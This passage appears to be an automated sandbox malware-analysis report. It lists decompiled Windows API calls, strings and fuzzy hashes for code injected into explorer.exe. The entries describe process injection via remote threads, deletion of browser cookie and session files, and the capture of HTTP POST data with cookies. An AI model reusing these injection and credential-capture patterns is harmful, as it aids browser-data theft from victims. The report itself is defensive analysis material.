                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,?,02C2382F,?,02C23C53,00000001), ref: 02C23613
                                                                                                                          • lstrcatW.KERNEL32(00000000,\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\,?,00000000,?,02C2382F,?,02C23C53,00000001), ref: 02C23623
                                                                                                                          • wsprintfW.USER32 ref: 02C23644
                                                                                                                            • Part of subcall function 02C214D8: wsprintfW.USER32 ref: 02C2150D
                                                                                                                            • Part of subcall function 02C214D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 02C2151C
                                                                                                                            • Part of subcall function 02C214D8: wsprintfW.USER32 ref: 02C21557
                                                                                                                            • Part of subcall function 02C214D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 02C2156A
                                                                                                                            • Part of subcall function 02C214D8: DeleteFileW.KERNELBASE(00000000), ref: 02C21571
                                                                                                                            • Part of subcall function 02C214D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 02C21584
                                                                                                                            • Part of subcall function 02C214D8: FindClose.KERNELBASE(00000000), ref: 02C2158F
                                                                                                                            • Part of subcall function 02C21011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,02C214CB), ref: 02C21020
                                                                                                                            • Part of subcall function 02C21011: HeapFree.KERNEL32(00000000), ref: 02C21027
                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000021,00000000,?,00000000,?,02C2382F,?,02C23C53,00000001), ref: 02C23672
                                                                                                                          • lstrcatW.KERNEL32(00000000,02C24614,?,00000000,?,02C2382F,?,02C23C53,00000001), ref: 02C23682
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileHeap$Findwsprintf$CloseFirstFolderNextPathProcessProcess32Speciallstrcat$AllocateAttributesCreateDeleteFreeHandleSleepSnapshotToolhelp32lstrcmpi
                                                                                                                          • String ID: %s%s$*.*$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\$iexplore.exe$microsoftedge.exe$microsoftedgecp.exe
                                                                                                                          • API String ID: 2436889709-3669280581
                                                                                                                          • Opcode ID: e3a6fed68ecb0c0a881c428150f0536bc2a62898608e258e25780e1f312ba889
                                                                                                                          • Instruction ID: a6f7812ecc5756535c1406cfc536b37c92ee2a22a0e41ae2900eaa1b5bab6be1
                                                                                                                          • Opcode Fuzzy Hash: e3a6fed68ecb0c0a881c428150f0536bc2a62898608e258e25780e1f312ba889
                                                                                                                          • Instruction Fuzzy Hash: 3711827079027067F63C23655C99F3F255FDBD5B52F0A0128F60EBA2C1CED4084C6AA9

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02C21363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C21374
                                                                                                                            • Part of subcall function 02C21363: Process32First.KERNEL32(00000000,?), ref: 02C21393
                                                                                                                            • Part of subcall function 02C21363: CloseHandle.KERNELBASE(00000000), ref: 02C213CB
                                                                                                                          • Sleep.KERNELBASE(000003E8,?,00000000,?,02C23834,?,02C23C53,00000001), ref: 02C236B3
                                                                                                                            • Part of subcall function 02C21000: GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
                                                                                                                            • Part of subcall function 02C21000: RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A
                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,?,02C23834,?,02C23C53,00000001), ref: 02C236CC
                                                                                                                          • lstrcatW.KERNEL32(00000000,\Mozilla\Firefox\Profiles\,?,00000000,?,02C23834,?,02C23C53,00000001), ref: 02C236DC
                                                                                                                            • Part of subcall function 02C214D8: wsprintfW.USER32 ref: 02C2150D
                                                                                                                            • Part of subcall function 02C214D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 02C2151C
                                                                                                                            • Part of subcall function 02C214D8: wsprintfW.USER32 ref: 02C21557
                                                                                                                            • Part of subcall function 02C214D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 02C2156A
                                                                                                                            • Part of subcall function 02C214D8: DeleteFileW.KERNELBASE(00000000), ref: 02C21571
                                                                                                                            • Part of subcall function 02C214D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 02C21584
                                                                                                                            • Part of subcall function 02C214D8: FindClose.KERNELBASE(00000000), ref: 02C2158F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Find$CloseFirstHeapwsprintf$AllocateAttributesCreateDeleteFolderHandleNextPathProcessProcess32SleepSnapshotSpecialToolhelp32lstrcat
                                                                                                                          • String ID: \Mozilla\Firefox\Profiles\$cookies.sqlite$firefox.exe$sessionstore.*
                                                                                                                          • API String ID: 2731919298-637609321
                                                                                                                          • Opcode ID: 32c8dcdfcbc6c947bc1075d346f8ea5942d83da53975d0cb2bfc8a7e05f84fd7
                                                                                                                          • Instruction ID: f3bce1ad66abc6dedfb0604d5958a847edd27c8b1321730aa5c34f0a079d3e5d
                                                                                                                          • Opcode Fuzzy Hash: 32c8dcdfcbc6c947bc1075d346f8ea5942d83da53975d0cb2bfc8a7e05f84fd7
                                                                                                                          • Instruction Fuzzy Hash: A4F0A05135017033AA3C336A5C08E6F195FCBD6F62705022CF10EA2281CE94090E6AB9

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 279 2c21363-2c2137f CreateToolhelp32Snapshot 280 2c213d1-2c213d6 279->280 281 2c21381-2c21399 Process32First 279->281 282 2c213c6-2c213c8 281->282 283 2c213ca-2c213cb CloseHandle 282->283 284 2c2139b-2c213ab lstrcmpiA 282->284 283->280 285 2c213b8-2c213c0 Process32Next 284->285 286 2c213ad-2c213b3 call 2c2133f 284->286 285->282 286->285
                                                                                                                          APIs
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C21374
                                                                                                                          • Process32First.KERNEL32(00000000,?), ref: 02C21393
                                                                                                                          • lstrcmpiA.KERNEL32(?), ref: 02C213A3
                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 02C213C0
                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 02C213CB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 868014591-0
                                                                                                                          • Opcode ID: 65464aa3793442ccda78959f5d7075f8d4aa621c83b83fcf1a057b4210ddf0a9
                                                                                                                          • Instruction ID: 3060be2af89f16f31900ff18b6b53dbda5f2c0f1df6f07c4b2400baf6c4e41d1
                                                                                                                          • Opcode Fuzzy Hash: 65464aa3793442ccda78959f5d7075f8d4aa621c83b83fcf1a057b4210ddf0a9
                                                                                                                          • Instruction Fuzzy Hash: 7EF0C8359511249BDB349A259D08FDE77BDEB49721F0106A0E84DD2181EFB44AAC8AD4

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 310 2c21235-2c21247 OpenFileMappingA 311 2c21249-2c21259 MapViewOfFile 310->311 312 2c2125c-2c21260 310->312 311->312
                                                                                                                          APIs
                                                                                                                          • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02C2123F
                                                                                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,02C23C33), ref: 02C21251
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$MappingOpenView
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3439327939-0
                                                                                                                          • Opcode ID: 778f6c3eb4c0bb021771b14326d6c25261bf8391d875649561625962465402e1
                                                                                                                          • Instruction ID: 2c2f4dd863dd0050245564127bee5de002c94860f981a698bee56b3c59d7a566
                                                                                                                          • Opcode Fuzzy Hash: 778f6c3eb4c0bb021771b14326d6c25261bf8391d875649561625962465402e1
                                                                                                                          • Instruction Fuzzy Hash: BED01732B552317BE3381EBB6C0CF836E9DDFC6AE1B064125B50DD2140DA608864C6F0

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 318 2c215a9-2c215bd SetFileAttributesW DeleteFileW
                                                                                                                          APIs
                                                                                                                          • SetFileAttributesW.KERNELBASE(00000000,00000020,00000000,02C2168B), ref: 02C215AF
                                                                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 02C215B6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesDelete
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2910425767-0
                                                                                                                          • Opcode ID: 04e1b99304085c255f5a278f7102c0732e9c6348e39220f1fd23d9334de7119f
                                                                                                                          • Instruction ID: 22b0249f49c7d0ff961260da2c11aa080de5b1736084930c86e32ce6e3d4bb14
                                                                                                                          • Opcode Fuzzy Hash: 04e1b99304085c255f5a278f7102c0732e9c6348e39220f1fd23d9334de7119f
                                                                                                                          • Instruction Fuzzy Hash: 1FB092328A2530ABD6392B14B80DFCE2658EF0E211B060642F201910408FA41A968AEA

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 319 2c21000-2c21010 GetProcessHeap RtlAllocateHeap
                                                                                                                          APIs
                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Heap$AllocateProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1357844191-0
                                                                                                                          • Opcode ID: c2f0cf2d32cb29c29cdf9963dd68a8d0ec5b86a2147071ac9cfd2cc948595a4a
                                                                                                                          • Instruction ID: 1af979b7e4cec21af8e59969ba89d7054135a906a0d2d1ef598e3099a690776f
                                                                                                                          • Opcode Fuzzy Hash: c2f0cf2d32cb29c29cdf9963dd68a8d0ec5b86a2147071ac9cfd2cc948595a4a
                                                                                                                          • Instruction Fuzzy Hash: 5CA002B5DA01109BDE7857A4B90DF153518F744745F158A44754685040DD64547C8F61

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02C21274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C21281
                                                                                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000001,774CE800), ref: 02C2201A
                                                                                                                          • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 02C22055
                                                                                                                          • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 02C220E5
                                                                                                                          • RtlMoveMemory.NTDLL(00000000,02C250A0,00000016), ref: 02C2210C
                                                                                                                          • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 02C22134
                                                                                                                          • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 02C22144
                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 02C2215E
                                                                                                                          • GetLastError.KERNEL32 ref: 02C22166
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02C22174
                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 02C2217B
                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,atan), ref: 02C22191
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02C22198
                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02C221AE
                                                                                                                          • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02C221D8
                                                                                                                          • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02C221EB
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02C221F2
                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 02C221F9
                                                                                                                          • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02C2220D
                                                                                                                          • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C22224
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02C22231
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 02C22237
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 02C2223D
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02C22240
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                          • String ID: 0-gw$atan$ntdll$opera_shared_counter
                                                                                                                          • API String ID: 1066286714-3282715980
                                                                                                                          • Opcode ID: 79c43d30b5fe72e6d47359b2dede17c20263adaa620b68846b6cf4a8e8cd1e9a
                                                                                                                          • Instruction ID: 2e6b4dc5bdcacdc11af0cceba4cbe17dbb8091093ee31e4bff182ef0905335ad
                                                                                                                          • Opcode Fuzzy Hash: 79c43d30b5fe72e6d47359b2dede17c20263adaa620b68846b6cf4a8e8cd1e9a
                                                                                                                          • Instruction Fuzzy Hash: 6861BF71A44324AFD324DF65CC84E6B7BEDEB88754F010A19F949D3241DFB4D9088BA2
                                                                                                                          APIs
                                                                                                                          • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 02C211A9
                                                                                                                          • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02C211C1
                                                                                                                          • lstrlen.KERNEL32(?,00000000), ref: 02C211C9
                                                                                                                          • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02C211D4
                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 02C211EE
                                                                                                                          • wsprintfA.USER32 ref: 02C21205
                                                                                                                          • CryptDestroyHash.ADVAPI32(?), ref: 02C2121E
                                                                                                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02C21228
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                          • String ID: %02X
                                                                                                                          • API String ID: 3341110664-436463671
                                                                                                                          • Opcode ID: 82646b71285f9aef54f01fa08986c336728841b7eff44790d238458cd82e732b
                                                                                                                          • Instruction ID: 81ae8600eb93b03d372943ee3767df9525efca4812a4faaa1068f939c87a2eaf
                                                                                                                          • Opcode Fuzzy Hash: 82646b71285f9aef54f01fa08986c336728841b7eff44790d238458cd82e732b
                                                                                                                          • Instruction Fuzzy Hash: EC111972D40118BFEB359BA9EC88FAEBBBCEB48301F114565F505E2140DE714E599BA0
                                                                                                                          APIs
                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 02C216D9
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 02C216E1
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02C216F1
                                                                                                                          • Thread32First.KERNEL32(00000000,0000001C), ref: 02C216FF
                                                                                                                          • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 02C2171E
                                                                                                                          • SuspendThread.KERNEL32(00000000), ref: 02C2172E
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02C2173D
                                                                                                                          • Thread32Next.KERNEL32(00000000,0000001C), ref: 02C2174D
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02C21758
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1467098526-0
                                                                                                                          • Opcode ID: 0e04f536e599c99297032ed9578a424cb1b7a93279b524fe195cf805a2f96e96
                                                                                                                          • Instruction ID: 7675ba7d644a6f55c4163fb657547620d9881e1df296c829ae82b08584e37bbc
                                                                                                                          • Opcode Fuzzy Hash: 0e04f536e599c99297032ed9578a424cb1b7a93279b524fe195cf805a2f96e96
                                                                                                                          • Instruction Fuzzy Hash: 0811A032858210EFD3359F609848B6A7BB8EFC5B01F060919F64982140CF70859DCBE7
                                                                                                                          APIs
                                                                                                                          • OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,02C22EC5), ref: 02C22E27
                                                                                                                            • Part of subcall function 02C21000: GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
                                                                                                                            • Part of subcall function 02C21000: RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A
                                                                                                                          • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 02C22E52
                                                                                                                          • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 02C22E7F
                                                                                                                          • StrStrIW.SHLWAPI(?,NetworkService), ref: 02C22E92
                                                                                                                            • Part of subcall function 02C21011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,02C214CB), ref: 02C21020
                                                                                                                            • Part of subcall function 02C21011: HeapFree.KERNEL32(00000000), ref: 02C21027
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$Heap$InformationQuery$AllocateFreeOpen
                                                                                                                          • String ID: NetworkService
                                                                                                                          • API String ID: 1656241333-2019834739
                                                                                                                          • Opcode ID: 12a1ef9b69aa48aee2ebeac028b061551548f44d8d061a46b49997d6305f21b9
                                                                                                                          • Instruction ID: bb98fab48e596464100b1b0820acf8533af04aa8649168bd1ffa4d0c4a361a12
                                                                                                                          • Opcode Fuzzy Hash: 12a1ef9b69aa48aee2ebeac028b061551548f44d8d061a46b49997d6305f21b9
                                                                                                                          • Instruction Fuzzy Hash: B101D871340355BFE3386A259C44F5B3B9DEBC83A2F014529F90BE2142DEB49C489B60
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02C21141: lstrlen.KERNEL32(?,?,?,00000000,?,02C229DD,00000001), ref: 02C21150
                                                                                                                            • Part of subcall function 02C21141: lstrlen.KERNEL32(:method POST,?,00000000,?,02C229DD,00000001), ref: 02C21155
                                                                                                                            • Part of subcall function 02C21000: GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
                                                                                                                            • Part of subcall function 02C21000: RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A
                                                                                                                            • Part of subcall function 02C2104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,02C22A16,?,00000001), ref: 02C21056
                                                                                                                            • Part of subcall function 02C2285F: RtlMoveMemory.NTDLL(?,-00000001,-00000001), ref: 02C228A2
                                                                                                                          • lstrcat.KERNEL32(00000000,dyn_header_host), ref: 02C22A4A
                                                                                                                          • lstrcat.KERNEL32(00000001,dyn_header_path), ref: 02C22A6C
                                                                                                                          • lstrcat.KERNEL32(?,dyn_header_ua), ref: 02C22A8D
                                                                                                                          • RtlZeroMemory.NTDLL(?,0000000A), ref: 02C22A96
                                                                                                                          • StrToIntA.SHLWAPI(00000000), ref: 02C22AB9
                                                                                                                          • wnsprintfA.SHLWAPI ref: 02C22B0D
                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02C22B2D
                                                                                                                          • lstrcat.KERNEL32(00000000,{:!:}), ref: 02C22B35
                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02C22B3C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcat$HeapMemorylstrlen$AllocAllocateMoveProcessVirtualZerownsprintf
                                                                                                                          • String ID: %s (HTTP2){:!:}%s%s{:!:}%s{:!:}$:authority $:method POST$:path $content-length $dyn_header_host$dyn_header_path$dyn_header_ua$host $user-agent ${:!:}
                                                                                                                          • API String ID: 2605944266-950501416
                                                                                                                          • Opcode ID: 2451228f1031d315c1016cd7e5e96d343973f29738ed35391591cd845dcd8b1d
                                                                                                                          • Instruction ID: 57a09a13711dcdf264bb35ad454dc3cdb8e7e64df0bc6152a960912023177dd8
                                                                                                                          • Opcode Fuzzy Hash: 2451228f1031d315c1016cd7e5e96d343973f29738ed35391591cd845dcd8b1d
                                                                                                                          • Instruction Fuzzy Hash: 045173706043619FD729EF258980B6FB7DAAFC8704F04081CE84A67242DF74DD4D9B66
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02C21141: lstrlen.KERNEL32(?,?,?,00000000,?,02C229DD,00000001), ref: 02C21150
                                                                                                                            • Part of subcall function 02C21141: lstrlen.KERNEL32(:method POST,?,00000000,?,02C229DD,00000001), ref: 02C21155
                                                                                                                          • RtlZeroMemory.NTDLL(?,0000000A), ref: 02C22FFA
                                                                                                                          • StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,02C23347), ref: 02C23024
                                                                                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,02C23347), ref: 02C23052
                                                                                                                          • wsprintfA.USER32 ref: 02C230B9
                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 02C230E5
                                                                                                                          • lstrcat.KERNEL32(?,{:!:}), ref: 02C230F8
                                                                                                                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,02C26038), ref: 02C23109
                                                                                                                          • RtlMoveMemory.NTDLL(00000000), ref: 02C23112
                                                                                                                            • Part of subcall function 02C21011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,02C214CB), ref: 02C21020
                                                                                                                            • Part of subcall function 02C21011: HeapFree.KERNEL32(00000000), ref: 02C21027
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$HeapMemorylstrcat$FreeMoveProcessZerowsprintf
                                                                                                                          • String ID: $%s{:!:}%s{:!:}%s{:!:}$Content-Length:$Cookie:$Host:$User-Agent:$application/json$application/x-www-form-urlencoded${:!:}
                                                                                                                          • API String ID: 2886538537-1627781280
                                                                                                                          • Opcode ID: 19c00ac1aa1534b675addc2d1f98d92952f698df2d541e7ff44c9a991f101e7f
                                                                                                                          • Instruction ID: 2790e9bb7c85c058589096d36b69e7e61164c99406a832a8920a71d66c8b4105
                                                                                                                          • Opcode Fuzzy Hash: 19c00ac1aa1534b675addc2d1f98d92952f698df2d541e7ff44c9a991f101e7f
                                                                                                                          • Instruction Fuzzy Hash: F631D1717003B46BD728AA249C54F6F36ABDBC0741F04482CF8469B282DEB9D80D9FE1
                                                                                                                          APIs
                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02C2322D
                                                                                                                          • wsprintfA.USER32 ref: 02C2329E
                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 02C232AF
                                                                                                                          • lstrcat.KERNEL32(00000000,{:!:}), ref: 02C232BE
                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02C232C1
                                                                                                                          • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02C232D2
                                                                                                                            • Part of subcall function 02C21011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,02C214CB), ref: 02C21020
                                                                                                                            • Part of subcall function 02C21011: HeapFree.KERNEL32(00000000), ref: 02C21027
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Heaplstrcatlstrlen$FreeMemoryMoveProcesswsprintf
                                                                                                                          • String ID: %s{:!:}%s{:!:}%s{:!:}$POST${:!:}
                                                                                                                          • API String ID: 3430864794-1604029033
                                                                                                                          • Opcode ID: 669d5d998cf030783bb4623c40fa18f4341127d657117b8079be8bb50cf5b258
                                                                                                                          • Instruction ID: a5c544e24d8b383a9c5c2ebe5fe3c9088917d2630f01e2436abbe77d3c2af470
                                                                                                                          • Opcode Fuzzy Hash: 669d5d998cf030783bb4623c40fa18f4341127d657117b8079be8bb50cf5b258
                                                                                                                          • Instruction Fuzzy Hash: FA416A71504395AFD321DF10DC88F6BBBADFB88345F040A2EF58692241DFB5990C9BA6
                                                                                                                          APIs
                                                                                                                          • RtlEnterCriticalSection.NTDLL(02C26038), ref: 02C23455
                                                                                                                          • lstrcat.KERNEL32 ref: 02C234AB
                                                                                                                            • Part of subcall function 02C22FAA: RtlZeroMemory.NTDLL(?,0000000A), ref: 02C22FFA
                                                                                                                            • Part of subcall function 02C22FAA: StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,02C23347), ref: 02C23024
                                                                                                                            • Part of subcall function 02C22FAA: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,02C23347), ref: 02C23052
                                                                                                                            • Part of subcall function 02C22FAA: wsprintfA.USER32 ref: 02C230B9
                                                                                                                            • Part of subcall function 02C22FAA: lstrcat.KERNEL32(00000000,00000000), ref: 02C230E5
                                                                                                                            • Part of subcall function 02C22F1F: CreateThread.KERNEL32(00000000,00000000,02C22ED2,?,00000000,00000000), ref: 02C22F2F
                                                                                                                            • Part of subcall function 02C22F1F: CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 02C22F36
                                                                                                                            • Part of subcall function 02C2105D: VirtualFree.KERNEL32(?,00000000,00008000,02C22B4B), ref: 02C21065
                                                                                                                          • RtlZeroMemory.NTDLL(0000000A,0000000A), ref: 02C23504
                                                                                                                          • StrToIntA.SHLWAPI(?,00000000,?), ref: 02C2352B
                                                                                                                          • RtlMoveMemory.NTDLL(00000000,?,-00000003), ref: 02C2358D
                                                                                                                          • RtlLeaveCriticalSection.NTDLL(02C26038), ref: 02C235C1
                                                                                                                            • Part of subcall function 02C21274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C21281
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
